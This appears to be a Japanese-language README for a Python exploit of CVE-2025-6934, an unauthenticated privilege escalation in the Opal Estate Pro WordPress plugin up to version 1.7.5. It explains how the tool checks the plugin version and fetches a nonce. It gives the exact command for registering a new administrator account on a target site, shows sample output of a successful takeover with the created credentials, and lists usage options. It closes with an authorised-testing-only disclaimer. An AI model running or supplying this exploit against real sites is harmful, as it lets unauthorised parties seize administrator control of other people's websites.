
Opal Estate Pro <= 1.7.5 - 未認証の権限昇格
WordPress 用プラグイン Opal Estate Pro – Property Management and Submission(FullHouse - Real Estate Responsive WordPress Theme で使用)は、バージョン 1.7.5 までのすべてのバージョンにおいて 権限昇格 の脆弱性の影響を受けます。
この Python エクスプロイトは、以下の手順で権限昇格プロセスを自動化します。
readme.txt を介して脆弱性のあるプラグインバージョンを確認します。python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail [email protected] -password nxp1234
[•] Plugin Version Check:
[+] Vulnerable version detected: 1.7.5
[•] Exploit Attempt Started
[+] Nonce Found: 70dd70630b
[+] HTTP Status: 200
[✔] Exploit Successful!
--------------------------
Username : nxploitedadmin
Email : [email protected]
Password : nxp1234
Role : administrator
--------------------------
Exploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD
CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g., http://site.com/path/)
-mail, --newmail NEWMAIL
Email to register as admin
-password, --newpassword NEWPASSWORD
Password for new admin user
このスクリプトは、教育目的および許可されたセキュリティテスト のみを対象としています。
同意なしに対象に対してこのツールを不正に使用することは固く禁止されています。
作成者: Khaled_alenazi (Nxploited)